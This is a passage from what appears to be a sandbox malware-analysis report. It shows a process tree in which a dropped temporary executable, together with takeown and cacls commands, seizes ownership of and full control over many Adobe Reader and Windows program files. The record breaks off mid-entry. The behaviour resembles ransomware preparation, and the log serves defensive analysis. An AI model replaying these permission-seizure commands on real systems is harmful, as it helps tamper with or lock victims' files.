  takeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"
  2⤵
  PID:4780
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:1664
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3608
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3168
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
  2⤵
  PID:4252
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
  2⤵
  PID:4472
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    PID:3156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4464

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
1⤵
PID:4052

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:4516
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:2188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
  2⤵
  PID:4044
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
  2⤵
  - Modifies file permissions
  PID:3292
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
  2⤵
  PID:216
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:3864
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
      4⤵
      PID:3284
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui"
      4⤵
      PID:3588
  - - C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C
      4⤵
      PID:3188

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
1⤵
- Modifies file permissions
PID:4876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "email_initiator.gif" -nobanner
1⤵
PID:4152
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "email_initiator.gif" -nobanner
  2⤵
  PID:4228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "main.css" -nobanner
1⤵
PID:4264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "review_email.gif" -nobanner
1⤵
PID:780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "warning.gif" -nobanner
1⤵
PID:2824

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "CourierStd.otf" -nobanner
1⤵
PID:4856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "trash.gif" -nobanner
  2⤵
  PID:4104
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "trash.gif" -nobanner
    3⤵
    PID:5116
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
      4⤵
      PID:4916
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "brt55.ths" -nobanner
      4⤵
      PID:5076
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
      4⤵
      PID:4844
  - - C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
      4⤵
      PID:4952
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:4968
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"
  2⤵
  - Modifies file permissions
  PID:3060
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CourierStd.otf" -nobanner
    3⤵
    PID:3416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
    3⤵
    - Modifies file permissions
    PID:4848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
    3⤵
    PID:4844
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C
  2⤵
  PID:3852

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"
1⤵
PID:4852
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
  2⤵
  - Modifies file permissions
  PID:2692
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "distribute_form.gif" -nobanner
  2⤵
  PID:4864
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
  2⤵
  PID:3668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
1⤵
PID:4976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MinionPro-It.otf" -nobanner
  2⤵
  PID:4924
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "brt32.clx" -nobanner
1⤵
PID:1372
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "brt32.clx" -nobanner
  2⤵
  PID:3976

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
1⤵
PID:2120

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
1⤵
PID:1580

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C
1⤵
PID:1532

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "ROMAN.TXT" -nobanner
1⤵
PID:2988

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C
1⤵
PID:3016

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner
1⤵
PID:1396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PDIALOG.exe.mui" -nobanner
1⤵
PID:1952
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "PDIALOG.exe.mui" -nobanner
  2⤵
  PID:2816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner
1⤵
PID:1972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner
1⤵
PID:1780
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner
  2⤵
  PID:3132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Seyes.jtp" -nobanner
1⤵
PID:1144

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui"
1⤵
PID:2452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "wabmig.exe" -nobanner
1⤵
PID:3520
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "wabmig.exe" -nobanner
  2⤵
  PID:960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:1196
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
  2⤵
  PID:3444

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
1⤵
- Loads dropped DLL
- Modifies file permissions
PID:1540

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
1⤵
- Modifies file permissions
PID:212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:4704
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
  2⤵
  PID:232

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "8452484841978456135296162084-1601070607-1549661302-242046121604340920411376419"
1⤵
PID:4876

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "MyriadCAD.otf" -nobanner
1⤵
PID:4136

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "reviewers.gif" -nobanner
1⤵
PID:4216

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
1⤵
- Modifies file permissions
PID:4980

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner
1⤵
PID:2500

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
1⤵
- Modifies file permissions
PID:1960

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2724
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
  2⤵
  PID:2676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
1⤵
PID:4552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
  2⤵
  PID:3132
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
    3⤵
    PID:2580
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3552
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
  2⤵
  PID:448
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
  2⤵
  PID:4588

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:2568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner
1⤵
PID:2532
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "jnwdui.dll.mui" -nobanner
  2⤵
  PID:3784
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "Memo.jtp" -nobanner
  2⤵
  PID:3784

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "jnwmon.dll.mui" -nobanner
1⤵
PID:4780

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui" /E /G Admin:F /C
1⤵
PID:224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Genko_2.jtp" -nobanner
1⤵
PID:4644
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "directories.acrodata" -nobanner
  2⤵
  PID:4712

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C
1⤵
PID:4300

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
1⤵
PID:3848

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4716

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
1⤵
PID:112

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:3404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "license.html" -nobanner
1⤵
PID:3860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "form_responses.gif" -nobanner
1⤵
PID:1096
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "form_responses.gif" -nobanner
  2⤵
  PID:1628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Identity-V" -nobanner
  2⤵
  PID:4936
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
  2⤵
  PID:3428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "reviews_super.gif" -nobanner
1⤵
PID:1976

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
1⤵
PID:1088

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"
1⤵
PID:2620

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
1⤵
PID:3468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "brt.hyp" -nobanner
1⤵
PID:2652
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "brt.hyp" -nobanner
  2⤵
  PID:1284
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    PID:2536
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1044

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "can32.clx" -nobanner
1⤵
PID:2816

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
1⤵
PID:1672

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
1⤵
PID:4584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
1⤵
PID:2208

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C
1⤵
PID:1400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "GREEK.TXT" -nobanner
1⤵
PID:3648
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "GREEK.TXT" -nobanner
  2⤵
  PID:3488
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3212
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
  2⤵
  PID:3308
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui"
    3⤵
    PID:3648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1400
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
  2⤵
  PID:1472
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
  2⤵
  PID:1668

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
1⤵
PID:2144

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
1⤵
PID:1948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
1⤵
PID:892
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "CENTEURO.TXT" -nobanner
  2⤵
  PID:1104
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui"
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:4192

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1944
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "SYMBOL.TXT" -nobanner
  2⤵
  PID:2884
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
  2⤵
  PID:2804
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
  2⤵
  PID:3628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe" -nobanner
1⤵
PID:2388
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "WinMail.exe" -nobanner
  2⤵
  PID:3644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:4656
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
  2⤵
  PID:3756

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
1⤵
PID:3184

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PDIALOG.exe.mui" -nobanner
1⤵
PID:4140

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui" /E /G Admin:F /C
1⤵
PID:4716

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"
1⤵
- Modifies file permissions
PID:4264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "qmgr1.dat" -nobanner
  2⤵
  PID:4520
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "qmgr1.dat" -nobanner
    3⤵
    PID:2576
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:4160
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"
  2⤵
  - Modifies file permissions
  PID:4508
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C
  2⤵
  PID:3720
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
    3⤵
    PID:4764
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
    3⤵
    PID:4408

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C
1⤵
PID:4820

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
1⤵
- Modifies file permissions
PID:2716
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "MyriadPro-Regular.otf" -nobanner
  2⤵
  PID:2692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "cryptocme2.sig" -nobanner
1⤵
PID:1160
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "cryptocme2.sig" -nobanner
  2⤵
  PID:2732
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:108
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:2508
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
  2⤵
  PID:2152

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "end_review.gif" -nobanner
1⤵
PID:1608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "review_shared.gif" -nobanner
1⤵
PID:2900
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "review_shared.gif" -nobanner
  2⤵
  PID:3152

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2324

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "tr.gif" -nobanner
1⤵
PID:1132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
1⤵
PID:2760
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
  2⤵
  PID:3068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "zx______.pfm" -nobanner
1⤵
PID:3128
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
